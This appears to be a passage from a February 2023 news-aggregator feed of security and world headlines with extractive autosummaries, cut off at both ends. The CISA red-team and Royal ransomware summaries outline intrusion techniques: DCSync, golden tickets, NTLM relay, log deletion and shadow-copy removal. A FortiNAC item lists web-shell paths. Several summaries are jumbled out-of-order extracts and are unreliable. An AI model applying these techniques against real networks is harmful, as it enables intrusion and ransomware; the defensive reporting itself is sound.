                Autosummary: Creating scheduled tasks through EX-22's panel (CYFIRMA). Through the service's web panel, cybercriminals can also set scheduled tasks, update agents to a new version, change a campaign's configuration, or create new campaigns. Telegram channel set up by EX-22 authors (CYFIRMA). By the end of the year, the threat actors announced new features that helped conceal traffic on compromised devices, indicating that the framework was under active development.


                Lionel Messi: Argentina forward wins Best Fifa men's player of the year award

                latam
                2023-02-27 https://www.bbc.co.uk/sport/football/64790342?at_medium=RSS&at_campaign=KARANGA
                Argentina and Paris St-Germain forward Lionel Messi is named the 2022 men's player of the year at the Best Fifa Awards.

                Autosummary: Alexia Putellas. The Best men's goalkeeper: Emiliano Martinez. The Best women's goalkeeper: Mary Earps. The Best men's coach: Lionel Scaloni. The Best women's coach: Sarina Wiegman. The Best Puskas award: Marcin Oleksy. The Best fan award: Argentina fans. The Best fair play award: Luka Lochoshvili.


                Week in review: ChatGPT and cybersecurity, hidden vulnerabilities in Docker containers

                ciber
                2023-02-26 https://www.helpnetsecurity.com/2023/02/26/week-in-review-chatgpt-and-cybersecurity-hidden-vulnerabilities-in-docker-containers/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Google Protected Computing: Ensuring privacy and safety of data regardless of location In this Help Net Security interview, Royal Hansen, VP of Engineering for Privacy, Safety, and Security at Google, talks about Protected Computing, the impact of data protection regulations, and privacy in general. Users looking for ChatGPT apps get malware instead The massive popularity of OpenAI’s chatbot ChatGPT has … More

                The post Week in review: ChatGPT and cybersecurity, hidden vulnerabilities in Docker containers appeared first on Help Net Security.

                "

                Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Google Protected Computing: Ensuring privacy and safety of data regardless of location In this Help Net Security interview, Royal Hansen, VP of Engineering for Privacy, Safety, and Security at Google, talks about Protected Computing, the impact of data protection regulations, and privacy in general. "


                Pro-Ukraine hackers CH01 defaced tens of Russian websites on the invasion anniversary

                rusia-ucrania
                2023-02-26 https://securityaffairs.com/142713/hacktivism/ch01-defaced-russian-websites.html

                The group of hacktivists CH01 defaced at least 32 Russian websites to mark a protest over the one-year anniversary of the Russian invasion. A group of hacktivists that goes online with the moniker CH01 defaced at least 32 Russian websites to mark a protest over the one-year anniversary of the Russian invasion. The news was […]

                The post Pro-Ukraine hackers CH01 defaced tens of Russian websites on the invasion anniversary appeared first on Security Affairs.

                "

                Autosummary: #Anonymous their affiliates and Pro-Ukrainian hackers have defaced at least 32 websites, showing the #Kremlin on fire, to mark a protest over the one-year anniversary of the #Russian invasion of #Ukraine during their #OpRussia campaign #WeStandWithUkraine #FckPutin pic.twitter.com/PUs0MiBeXo — Anonymous Operations (@AnonOpsSE) February 25, 2023. The hackers have uploaded a video showing the Kremlin burning on the defaced websites.


                Ransomware attack on food giant Dole Food Company blocked North America production

                exploits
                2023-02-26 https://securityaffairs.com/142726/cyber-crime/dole-food-company-ransomware-attack.html

                The producers of fruit and vegetables Dole Food Company disclosed a ransomware attack that impacted its operations. Dole Food Company is an Irish agricultural multinational corporation, it is one of the world’s largest producers of fruit and vegetables, operating with 38,500 full-time and seasonal employees who supply some 300 products in 75 countries. Dole reported 2021 revenues of $6.5 billion. The […]

                The post Ransomware attack on food giant Dole Food Company blocked North America production appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Dole Food Company) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Peru recalls ambassador over Mexico's "unacceptable" support for Pedro Castillo

                latam
                2023-02-25 https://www.bbc.co.uk/news/world-latin-america-64769382?at_medium=RSS&at_campaign=KARANGA
                Mexico's president described Dina Boluarte's government as "unconstitutional", sparking fury in Peru.



                PureCrypter malware hits govt orgs with ransomware, info-stealers

                exploits ransomware
                2023-02-25 https://www.bleepingcomputer.com/news/security/purecrypter-malware-hits-govt-orgs-with-ransomware-info-stealers/
                A threat actor has been targeting government entities with PureCrypter malware downloader that has been seen delivering multiple information stealers and ransomware strains. [...]

                Autosummary: "The campaign was found to have delivered several types of malware including Redline Stealer, AgentTesla, Eternity, Blackmoon and Philadelphia Ransomware," the researchers say. "


                Dish Network goes offline after likely cyberattack, employees cut off

                ciber
                2023-02-25 https://www.bleepingcomputer.com/news/security/dish-network-goes-offline-after-likely-cyberattack-employees-cut-off/
                American TV giant and satellite broadcast provider, Dish Network has mysteriously gone offline with its websites and apps ceasing to function over the past 24 hours. [...]

                Autosummary: Dish Network website, phones, apps offline. Dish Network websites and apps including Dish.com, DishWireless.com, and Dish Anywhere are facing a prolonged outage with customers unable to get to their accounts or stream TV online (image: Dish.com website offline amid "internal system issue", BleepingComputer). BleepingComputer also observed the Dish Anywhere Android app experiencing connection issues (image: Dish Anywhere app unreachable, BleepingComputer). Customers have also reported experiencing problems when attempting to pay their bills or calling customer service centers. Employees report it's a cyberattack. A source in touch with a Dish Network employee told BleepingComputer that the network "has been hit" (by a cyber attack) with employees seeing "blank icons" on their Desktop—something that typically occurs after a ransomware infection encrypts the victim's files.


                The alleged author of NLBrute Malware was extradited to US from Georgia

                exploits
                2023-02-24 https://securityaffairs.com/142627/breaking-news/nlbrute-malware-author-extradicted.html

                Dariy Pankov, a Russian VXer behind the NLBrute malware, has been extradited to the United States from Georgia. The Russian national Dariy Pankov, aka dpxaker, is suspected to be the author of the NLBrute malware. The man has been extradited to the United States from Georgia. “Pankov, a citizen and resident of Russia, was taken […]

                The post The alleged author of NLBrute Malware was extradited to US from Georgia appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, NLBrute) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Employees bypass cybersecurity guidance to achieve business objectives

                ciber
                2023-02-24 https://www.helpnetsecurity.com/2023/02/24/bypass-cybersecurity-guidance/

                By 2025, nearly half of cybersecurity leaders will change jobs, 25% for different roles entirely due to multiple work-related stressors, according to Gartner. “Cybersecurity professionals are facing unsustainable levels of stress,” said Deepti Gopal, Director Analyst, Gartner. “CISOs are on the defense, with the only possible outcomes that they don’t get hacked or they do. The psychological impact of this directly affects decision quality and the performance of cybersecurity leaders and their teams,” Gopal added. … More

                The post Employees bypass cybersecurity guidance to achieve business objectives appeared first on Help Net Security.

                "

                Autosummary: “Friction that slows down employees and leads to insecure behavior is a significant driver of insider risk,” said Paul Furtado, VP Analyst, Gartner.


                Dutch Police arrest three ransomware actors extorting €2.5 million

                exploits ransomware
                2023-02-24 https://www.bleepingcomputer.com/news/security/dutch-police-arrest-three-ransomware-actors-extorting-25-million/
                The Amsterdam cybercrime police team has arrested three men for ransomware activity that generated €2.5 million from extorting small and large organizations in multiple countries. [...]



                Microsoft announces automatic BEC, ransomware attack disruption capabilities

                exploits ransomware
                2023-02-24 https://www.helpnetsecurity.com/2023/02/24/bec-ransomware-attack-disruption/

                Last year, Microsoft announced automatic attack disruption capabilities in Microsoft 365 Defender, its enterprise defense suite. On Wednesday, it announced that these capabilities will now help organizations disrupt two common attack scenarios: BEC (business email compromise) and human-operated ransomware attacks. Reaction speed is paramount for disrupting attacks A fast defensive response to initiated cyber attacks is becoming increasingly crucial for organizations: According to IBM Security’s X-Force team, the average time to complete a ransomware attack … More

                The post Microsoft announces automatic BEC, ransomware attack disruption capabilities appeared first on Help Net Security.

                "

                Autosummary: "


                How to Use AI in Cybersecurity and Avoid Being Trapped

                ciber
                2023-02-24 https://thehackernews.com/2023/02/how-to-use-ai-in-cybersecurity-and.html
                The use of AI in cybersecurity is growing rapidly and is having a significant impact on threat detection, incident response, fraud detection, and vulnerability management. According to a report by Juniper Research, the use of AI for fraud detection and prevention is expected to save businesses $11 billion annually by 2023. But how to integrate AI into business cybersecurity infrastructure

                Autosummary: Its AI algorithms analyze and classify web content in real-time, which allows web filtering software to quickly identify and block websites that contain harmful content, such as malware, phishing scams, and inappropriate material. However, deploying AI in business cybersecurity can be a complex and challenging process, and there are many potential pitfalls to avoid to ensure that AI is effectively integrated into your cybersecurity strategy.


                CISA Sounds Alarm on Cybersecurity Threats Amid Russia's Invasion Anniversary

                ciber
                2023-02-24 https://thehackernews.com/2023/02/cisa-sounds-alarm-on-cybersecurity.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging organizations and individuals to increase their cyber vigilance, as Russia's military invasion of Ukraine officially enters one year. "CISA assesses that the United States and European nations may experience disruptive and defacement attacks against websites in an attempt to sow chaos and societal discord on February 24,



                Hackers are actively exploiting CVE-2022-47966 flaw in Zoho ManageEngine

                exploits
                2023-02-24 https://securityaffairs.com/142635/hacking/zoho-manageengine-attacks.html

                Experts warn of threat actors actively exploiting the critical CVE-2022-47966 (CVSS score: 9.8) flaw in Zoho ManageEngine. Multiple threat actors are actively exploiting the Zoho ManageEngine CVE-2022-47966 (CVSS score: 9.8) in attacks in the wild, Bitdefender Labs reported. “Starting on January 20 2023, Bitdefender Labs started to notice a global increase in attacks using the ManageEngine exploit CVE-2022-47966.” reads the […]

                The post Hackers are actively exploiting CVE-2022-47966 flaw in Zoho ManageEngine appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Zoho ManageEngine) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Stanford University discloses data breach affecting PhD applicants

                financial
                2023-02-24 https://www.bleepingcomputer.com/news/security/stanford-university-discloses-data-breach-affecting-phd-applicants/
                Stanford University disclosed a data breach after files containing Economics Ph.D. program admission information were downloaded from its website between December 2022 and January 2023. [...]



                News Corp says state hackers were on its network for two years

                government
                2023-02-24 https://www.bleepingcomputer.com/news/security/news-corp-says-state-hackers-were-on-its-network-for-two-years/
                Mass media and publishing giant News Corporation (News Corp) says that attackers behind a breach disclosed in 2022 first gained access to its systems two years before, in February 2020. [...]



                Malwarebytes wins 2023 CRN "Coolest Endpoint And Managed Security Companies" award

                exploits
                2023-02-24 https://www.malwarebytes.com/blog/business/2023/02/malwarebytes-wins-2023-crn-coolest-endpoint-and-managed-security-companies-award

                Categories: Business

                CRN named Malwarebytes one of the “Coolest Endpoint And Managed Security Companies” on the 2023 CRN Security 100.


                The post Malwarebytes wins 2023 CRN "Coolest Endpoint And Managed Security Companies" award appeared first on Malwarebytes Labs.

                "

                Autosummary: By featuring Malwarebytes on their list of key cybersecurity vendors for 2023, CRN recognizes the strides we’ve made to best serve our channel partners in the past year, including: expanding our partner network to more than 3,000 global MSP partners and over 250 percent growth YoY; forming new strategic partnerships with Addigy, Atera, ConnectWise, GCN Group, Kaseya/Datto, Sherweb, TeamViewer, and Pax8, among others. And on the Value Added Reseller (VAR) front: continuing to strengthen key partnerships with distribution and partners, including TD Synnex, Carahsoft, CDW, SHI, Insight, and Howard Technologies. (Image: Malwarebytes OneView dashboard view.) Constantly expanding: Malwarebytes has only continued to build upon both OneView for MSPs and Nebula for Value-Added Resellers (VARs), adding three new modules that simplify breach prevention within the same cloud interface MSPs already trust for detection and remediation. Vulnerability and Patch Management enables MSPs to take control of their full vulnerability assessment and patching process, helping ensure defenses are up to date across their clients’ environments.


                UK won the Military Cyberwarfare exercise Defence Cyber Marvel 2 (DCM2)

                ciber
                2023-02-24 https://securityaffairs.com/142669/cyber-warfare-2/uk-won-defence-cyber-marvel-2-dcm2.html

                Defence Cyber Marvel 2 (DCM2) is the largest Western Europe-led cyber exercise that took place in Tallinn with 34 teams from 11 countries. The Defence Cyber Marvel 2 (DCM2) is the largest training exercise organised by the Army Cyber Association to allow personnel from across the Armed Forces to build their skills within the cyber […]

                The post UK won the Military Cyberwarfare exercise Defence Cyber Marvel 2 (DCM2) appeared first on Security Affairs.

                "

                Autosummary: 34 teams from 11 countries, including India, Italy, Ghana, Japan, US, Ukraine, Kenya, and Oman, have taken part in a live-fire cyber battle that lasted seven days.


                CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks

                ciber
                2023-02-24 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a
                "

                Autosummary: On Workstation 1, the team leveraged a modified SharpHound collector, ldapsearch , and command-line tool, dsquery , to query and scrape AD information, including AD users [T1087.002], computers [T1018], groups [T1069.002], access control lists (ACLs), organizational units (OU), and group policy objects (GPOs) [T1615]. As a long-term effort, CISA recommends organizations prioritize implementing a more modern, Zero Trust network architecture that: Leverages secure cloud services for key enterprise security capabilities (e.g., identity and access management, endpoint detection and response, policy enforcement).[T1136.001] Account Manipulation [T1098 ] Intrusion Detection or Prevention Systems Endpoint Protection Platform Web Proxy Logs Detect and identify source IP and source process of malicious traffic Investigate destination IP address Triage compromised host Develop response plan None Local Admin User Account Creation (server) Create a local administrator account on a target server system. Figure 1: Red Team Cyber Threat Activity: Initial Access and Lateral Movement While traversing the network, the team varied their lateral movement techniques to evade detection and because the organization had non-uniform firewalls between the sites and within the sites (within the sites, firewalls were configured by subnet). Lateral Movement, Credential Access, and Persistence The red team moved laterally [TA0008] from Workstation 2 to the Site 1 SharePoint server and had SYSTEM level access to the Site 1 SharePoint server, which had Unconstrained Delegation enabled.The user employed a KeePass password manager that the team was able to use to obtain passwords for other internal websites, a kernel-based virtual machine (KVM) server, virtual private network (VPN) endpoints, firewalls, and another KeePass database with credentials. 
The team then used the TGT to harvest advanced encryption standard (AES)-256 hashes via DCSync [T1003.006] for the krbtgt account and several privileged accounts—including domain admins, workstation admins, and a system center configuration management (SCCM) service account (SCCM Account 1).Intrusion Detection or Prevention Systems Endpoint Protection Platform Web Proxy Logs Detect and identify source IP and source process of malicious traffic Investigate destination IP address Triage compromised host Develop response plan None Trigger Host-Based Protection—Domain Controller Upload and execute a well-known (e.g., with a signature) malicious file to a target DC system to generate host-based alerts.Platform Detect target hosts and ports Identify associated scanning process Analyze scanning host once detected Develop response plan None Comprehensive Active Directory and Host Enumeration Perform AD enumeration by querying all domain objects from the DC; and enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer (Workstation and Server). Post-Exploitation Activity: Gaining Access to SBSs With persistent, deep access established across the organization’s networks and subnetworks, the red team began post-exploitation activities and attempted to access SBSs. 
Plan for Potential Access to SBS 1 Conducting open-source research [T1591.001], the team identified that SBS 1 and 2 assets and associated management/upkeep staff were located at Sites 5 and 6, respectively. Phishing Lateral movement reuse Generation and use of the golden ticket Anomalous LDAP traffic Anomalous internal share enumeration Unconstrained Delegation server compromise DCSync Anomalous account usage during lateral movement Anomalous outbound network traffic Anomalous outbound SSH connections to the team’s cloud servers from workstations Most of the red team’s Phase II actions failed to provoke a response from the people, processes, and technology defending the organization’s network. Specifically, the team used the SharePoint server’s machine NTLM hash and DFSCoerce’s Python script (DFSCoerce.py) to prompt DC authentication to the server, and they captured the incoming DC TGT using Rubeus [T1550.002], [T1557.001]. While in the MDM MySQL database, Elevating the selected MDM user’s account privileges to administrator privileges, and Modifying the user’s account by adding Create Policy and Delete Policy permissions [T1098], [T1548]. Windows Service [T1543.003] Windows Event Logs Detect account compromise Analyze compromised host Develop response plan None Domain Admin Lateral Movement—Workstation to Domain Controller Use a previously compromised domain admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on a target DC.
Introduction CISA has authority to, upon request, provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to Federal and non-Federal entities with respect to cybersecurity risks. The meeting invite took them to a red team-controlled domain [T1566.002] with a button, which, when clicked, downloaded a “malicious” ISO file [T1204]. The organization failed to detect lateral movement, persistence, and C2 activity via their intrusion detection or prevention systems, endpoint protection platform, web proxy logs, and Windows event logs. CISA is releasing this Cybersecurity Advisory (CSA) detailing the red team’s tactics, techniques, and procedures (TTPs) and key findings to provide network defenders of critical infrastructure organizations proactive steps to reduce the threat of similar activity from malicious cyber actors. Using the same methodology as described by the steps in the Plan for Potential Access to SBS 1 section above, the team gained interactive root access to two Site 6 SBS 2-connected workstations: a software engineering workstation (Workstation 5) and a user administrator workstation (Workstation 6). One user triggered the red team’s payload, which led to installation of a persistent beacon on the user’s workstation (Workstation 2), giving the team persistent access to Workstation 2. This technique, which also leverages CDNs, allows the beacon to appear to connect to third-party domains, such as nytimes.com, when it is actually connecting to the team’s redirect server. If NTLM must be enabled, enable Extended Protection for Authentication (EPA) to prevent some NTLM-relay attacks, and implement SMB signing to prevent certain adversary-in-the-middle and
pass-the-hash attacks [CPG 3.4]. Phase II: Red Team Measurable Events Activity The red team executed 13 measurable events designed to provoke a response from the people, processes, and technology defending the organization’s network. The team gained root access to workstations connected to MDM 1—specifically, the team accessed Workstation 4—by: Selecting an MDM user from the plaintext credentials in PowerShell scripts on MDM 1. The team gained persistent access to the organization’s network, moved laterally across the organization’s multiple geographically separated sites, and eventually gained access to systems adjacent to the organization’s sensitive business systems (SBSs). However, the team assesses that by using Secure Shell (SSH) session socket files (see below), they could have accessed any hosts available to the users whose workstations were compromised. REFERENCES [1] Bleeping Computer: New DFSCoerce NTLM Relay attack allows Windows domain takeover APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES See Table 3 for all referenced red team tactics and techniques in this advisory. Attempts to Access SBS 2 Conducting open-source research, the team identified an organizational branch [T1591] that likely had access to SBS 2. Consider using red team tools, such as SharpHound, for AD enumeration to identify users with excessive privileges and misconfigured hosts (e.g., with Unconstrained Delegation enabled). However, a multifactor authentication (MFA) prompt prevented the team from achieving access to one SBS, and Phase I ended before the team could implement a seemingly viable plan to achieve access to a second SBS. Table 1: Measurable Events Measurable Event Description MITRE ATT&CK Technique(s) Expected Detection Points Expected Network Defender Reactions Reported Reactions Internal Port Scan Launch scan from inside the network from a previously gained workstation to enumerate ports on target workstation, server, and domain controller system(s).
Despite having a mature cyber posture, the organization did not detect the red team’s activity throughout the assessment, including when the team attempted to trigger a security response. "


                <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a" hreflang="en">#StopRansomware: Royal Ransomware</a>

                exploits ransomware ciber
                2023-02-24 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
                "

                Autosummary: REFERENCES [1] Royal Rumble: Analysis of Royal Ransomware (cybereason.com) [2] DEV-0569 finds new ways to deliver Royal ransomware, various payloads - Microsoft Security Blog [3] 2023-01: ACSC Ransomware Profile - Royal | Cyber.gov.au ACKNOWLEDGEMENTS Recorded Future, Coveware, Digital Asset Redemption, Q6, and RedSense contributed to this CSA. Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators. Batch files create a new admin user [T1078.002], force a group policy update, set pertinent registry keys to auto-extract [T1119] and execute the ransomware, monitor the encryption process, and delete files upon completion—including Application, System, and Security event logs [T1070.001]. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.
REPORTING FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. According to open-source reporting, victims have unknowingly installed malware that delivers Royal ransomware after receiving phishing emails containing malicious PDF documents [T1566.001], and malvertising [T1566.002]. [2] According to third-party reporting, Royal actors most commonly (in 66.7% of incidents) gain initial access to victim networks via successful phishing emails [T1566]. Encryption Before starting the encryption process, Royal actors: Use Windows Restart Manager to determine whether targeted files are currently in use or blocked by other applications [T1486]. [1] Use Windows Volume Shadow Copy service (vssadmin.exe) to delete shadow copies to prevent system recovery. [1] FBI has found numerous batch (.bat) files on impacted systems which are typically transferred as an encrypted 7zip file. [CPG 7.3] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). "


                DarkLight partners with Resecurity to improve enterprise cybersecurity posture

                ciber
                2023-02-23 https://www.helpnetsecurity.com/2023/02/23/darklight-resecurity/

                DarkLight and Resecurity partnership will give DarkLight access to Resecurity’s threat intelligence solution called Context, which identifies indications of cyber intrusions and data breaches for clients. This will give DarkLight the ability to provide comprehensive risk assessments tailored to each client’s unique business context. DarkLight’s knowledge driven AI platform, Cyio, was originally developed at the Pacific Northwest National Laboratory (one of the Department of Energy’s national labs) to support an NSA effort. Clients can analyze … More

                The post DarkLight partners with Resecurity to improve enterprise cybersecurity posture appeared first on Help Net Security.

                "

                Autosummary: "


                Malwarebytes Application Block restricts access to outdated and unsafe apps

                exploits
                2023-02-23 https://www.helpnetsecurity.com/2023/02/23/malwarebytes-application-block/

                Malwarebytes has added Malwarebytes Application Block to its Nebula and OneView endpoint protection platforms. The new threat prevention module helps resource-strained security teams guard against unsafe third-party Windows applications, meet key compliance requirements and encourage productivity without adding management complexity. Third-party apps pose a serious security threat to businesses with limited IT resources and expertise. Vulnerabilities in Android applications have led to more than one million malicious application downloads, with researchers frequently uncovering malware-ridden applications … More

                The post Malwarebytes Application Block restricts access to outdated and unsafe apps appeared first on Help Net Security.

                "

                Autosummary: "


                Python Developers Warned of Trojanized PyPI Packages Mimicking Popular Libraries

                exploits
                2023-02-23 https://thehackernews.com/2023/02/python-developers-warned-of-trojanized.html
                Cybersecurity researchers are warning of "imposter packages" mimicking popular libraries available on the Python Package Index (PyPI) repository. The 41 malicious PyPI packages have been found to pose as typosquatted variants of legitimate modules such as HTTP, AIOHTTP, requests, urllib, and urllib3. The names of the packages are as follows: aio5, aio6, htps1, httiop, httops, hxxplat, hxxpscolor "

                Autosummary: "


                Cybersecurity layoffs in 2023: What to expect?

                ciber
                2023-02-23 https://www.helpnetsecurity.com/2023/02/23/cybersecurity-layoffs-2023/

                The economic downturn predicted for 2023 will lead to layoffs but cybersecurity workers will be least affected, says the latest (ISC)² report. Also, as soon as things get better, they will likely be the first ones to get (re)hired. Execs have realized the importance of cybersecurity There have been massive layoffs by tech and other companies in the last few months. In December 2022, (ISC)² polled 1,000 C-suite executives from Germany, Japan, Singapore, the UK … More

                The post Cybersecurity layoffs in 2023: What to expect? appeared first on Help Net Security.

                "

                Autosummary: And when executives evaluate who will be laid off, job performance will be the most important factor (50%), followed by expertise/skill set (49%), skill redundancy (43%), diversity/team composition (37%), and salary (30%). "


                The Secret Vulnerability Finance Execs are Missing

                financial exploits
                2023-02-23 https://thehackernews.com/2023/02/the-secret-vulnerability-finance-execs.html
                The (Other) Risk in Finance A few years ago, a Washington-based real estate developer received a document link from First American – a financial services company in the real estate industry – relating to a deal he was working on. Everything about the document was perfectly fine and normal. The odd part, he told a reporter, was that if he changed a single digit in the URL, suddenly, he could see "

                Autosummary: With no technical tools or expertise, the developer could retrieve FirstAm records dating back to 2003 – 885 million in total, many containing the kinds of sensitive data disclosed in real estate dealings, like bank details, social security numbers, and of course, names and addresses. It didn't end there, since "users' biometric digital fingerprints used for authentication, along with users' personal data (names, dates of birth, etc.), were exposed in the cloud." Over three-quarters leaked AWS tokens, enabling outside parties to access private cloud services, and nearly half leaked tokens that further enabled "full access to numerous, often millions, of private files." "


                New S1deload Malware Hijacking Users' Social Media Accounts and Mining Cryptocurrency

                exploits
                2023-02-23 https://thehackernews.com/2023/02/new-s1deload-malware-hijacking-users.html
                An active malware campaign has set its sights on Facebook and YouTube users by leveraging a new information stealer to hijack the accounts and abuse the systems' resources to mine cryptocurrency. Bitdefender is calling the malware S1deload Stealer for its use of DLL side-loading techniques to get past security defenses and execute its malicious components. "Once infected, S1deload Stealer steals "

                Autosummary: "


                Russian malware dev behind NLBrute hacking tool extradited to US

                exploits rusia-ucrania
                2023-02-23 https://www.bleepingcomputer.com/news/security/russian-malware-dev-behind-nlbrute-hacking-tool-extradited-to-us/
                A Russian malware developer accused of creating and selling the NLBrute password-cracking tool was extradited to the United States after being arrested in the Republic of Georgia last year on October 4. [...] "

                Autosummary: "


                Fruit giant Dole suffers ransomware attack impacting operations

                exploits ransomware
                2023-02-23 https://www.bleepingcomputer.com/news/security/fruit-giant-dole-suffers-ransomware-attack-impacting-operations/
                Dole Food Company, one of the world's largest producers and distributors of fresh fruit and vegetables, has announced that it is dealing with a ransomware attack that impacted its operations. [...] "

                Autosummary: "


                Clasiopa hackers use new Atharvan malware in targeted attacks

                exploits
                2023-02-23 https://www.bleepingcomputer.com/news/security/clasiopa-hackers-use-new-atharvan-malware-in-targeted-attacks/
                Security researchers have observed a hacking group targeting companies in the materials research sector with a unique toolset that includes a custom remote access trojan (RAT) called Atharvan. [...] "

                Autosummary: Symantec reports that the attackers perform various actions post-compromise, including: checking the IP address of the breached system; disabling endpoint protection products by stopping their services; deploying malware that can scan for specific files and exfiltrate them as ZIP archives; clearing Sysmon logs and event logs to wipe the traces of the malicious activity; and creating a scheduled task ("network service") to list file names. Symantec's investigation revealed that along with its backdoor, Clasiopa also used legitimate software such as Agile DGS and Agile FD, signed with old certificates. "


                Fake ChatGPT apps spread Windows and Android malware

                exploits
                2023-02-23 https://www.tripwire.com/state-of-security/fake-chatgpt-apps-spread-windows-and-android-malware
                Malicious hackers are taking advantage of people searching the internet for free access to ChatGPT in order to direct them to malware and phishing sites. Read more in my article on the Hot for Security blog. "

                Autosummary: Another, a variant of the Spynote malware, steals sensitive information from users' Android devices, including call logs, contacts, and SMS messages. "


                Food giant Dole hit by ransomware, halts North American production temporarily

                exploits ransomware
                2023-02-23 https://www.bitdefender.com/blog/hotforsecurity/food-giant-dole-hit-by-ransomware-halts-north-american-production-temporarily/
                Earlier this month a cyber attack on food produce giant Dole caused the firm to shut down its production plants across North America for a period of time, and halt shipments to stores. Read more in my article on the Hot for Security blog. "

                Autosummary: In the hours following the CNN article, Dole issued a statement to the press, confirming that it had fallen foul of ransomware: Upon learning of this incident, Dole moved quickly to contain the threat and engaged leading third-party cybersecurity experts, who have been working in partnership with Dole's internal teams to remediate the issue and secure systems. "


                Users looking for ChatGPT apps get malware instead

                exploits
                2023-02-23 https://www.helpnetsecurity.com/2023/02/23/chatgpt-windows-android/

                The massive popularity of OpenAI’s chatbot ChatGPT has not gone unnoticed by cyber criminals: they are exploiting the public’s eagerness to experiment with it to trick users into downloading Windows and Android malware and visit phishing pages. Fake ChatGPT apps for Windows and Android Cyble’s researchers have spotted: A Facebook page misusing the ChatGPT name and logo to direct the audience to pages mimicking the ChatGPT website and offering a (non-existent) ChatGPT app for Windows … More

                The post Users looking for ChatGPT apps get malware instead appeared first on Help Net Security.

                "

                Autosummary: "


                Hackers Using Trojanized macOS Apps to Deploy Evasive Cryptocurrency Mining Malware

                exploits
                2023-02-23 https://thehackernews.com/2023/02/hackers-using-trojanized-macos-apps-to.html
                Trojanized versions of legitimate applications are being used to deploy evasive cryptocurrency mining malware on macOS systems. Jamf Threat Labs, which made the discovery, said the XMRig coin miner was executed as Final Cut Pro, a video editing software from Apple, which contained an unauthorized modification. "This malware makes use of the Invisible Internet Project (i2p) [...] to download "

                Autosummary: "


                Experts Sound Alarm Over Growing Attacks Exploiting Zoho ManageEngine Products

                exploits
                2023-02-23 https://thehackernews.com/2023/02/experts-sound-alarm-over-growing.html
                Multiple threat actors have been observed opportunistically weaponizing a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023. Tracked as CVE-2022-47966 (CVSS score: 9.8), the remote code execution flaw allows a complete takeover of the susceptible systems by unauthenticated attackers. As many as 24 different products, including Access "

                Autosummary: "


                Mexico passes controversial reform of election watchdog

                latam
                2023-02-23 https://www.bbc.co.uk/news/world-latin-america-64742733?at_medium=RSS&at_campaign=KARANGA
                The reform reduces the size and the budget of the independent body overseeing elections in Mexico. "

                Autosummary: "


                Sam Bankman-Fried hit with four new criminal charges

                financial
                2023-02-23 https://www.bbc.co.uk/news/business-64740128?at_medium=RSS&at_campaign=KARANGA
                Sam Bankman-Fried is accused of making more than 300 illegal political donations. "

                Autosummary: "


                Forsage DeFi platform founders indicted for $340 million scam

                financial
                2023-02-23 https://www.bleepingcomputer.com/news/security/forsage-defi-platform-founders-indicted-for-340-million-scam/
                A Federal grand jury in the District of Oregon has indicted four Russian nationals founders of Forsage decentralized finance (DeFi) cryptocurrency investment platform for allegedly running a global Ponzi and pyramid scheme that raised $340 million. [...] "

                Autosummary: "


                Ukraine says Russian hackers backdoored govt websites in 2021

                rusia-ucrania
                2023-02-23 https://www.bleepingcomputer.com/news/security/ukraine-says-russian-hackers-backdoored-govt-websites-in-2021/
                The Computer Emergency Response Team of Ukraine (CERT-UA) says Russian state hackers have breached multiple government websites this week using backdoors planted as far back as December 2021. [...] "

                Autosummary: "


                Pirated Final Cut Pro infects your Mac with cryptomining malware

                exploits
                2023-02-23 https://www.bleepingcomputer.com/news/security/pirated-final-cut-pro-infects-your-mac-with-cryptomining-malware/
                Security researchers discovered a cryptomining operation targeting macOS with a malicious version of Final Cut Pro that remains largely undetected by antivirus engines. [...] "

                Autosummary: Anti-Activity Monitor script (Jamf). Ventura and the road ahead: The latest version of macOS, codenamed “Ventura,” introduces more stringent code-signing checks that threaten to make hiding and launching malware from inside user-launched apps, especially pirated ones, ineffective. "


                Fortinet FortiNAC CVE-2022-39952 flaw exploited in the wild hours after the release of PoC exploit

                exploits
                2023-02-23 https://securityaffairs.com/142621/hacking/fortinet-fortinac-cve-2022-39952-exploitation.html

                Threat actors are actively exploiting the Fortinet FortiNAC vulnerability CVE-2022-39952 a few hours after the publication of the PoC exploit code. This week, researchers at Horizon3 cybersecurity firm have released a proof-of-concept exploit for a critical-severity vulnerability, tracked as CVE-2022-39952, in Fortinet’s FortiNAC network access control solution. Last week, Fortinet has released security updates to address two […]

                The post Fortinet FortiNAC CVE-2022-39952 flaw exploited in the wild hours after the release of PoC exploit appeared first on Security Affairs.

                "

                Autosummary: The installation paths we have seen are: ▪ bsc/campusMgr/ui/ROOT/fortii.jsp ▪ bsc/campusMgr/ui/ROOT/shell.jsp — Germán Fernández (@1ZRR4H) February 23, 2023 "


                Royal Mail schools LockBit in leaked negotiation

                ransomware
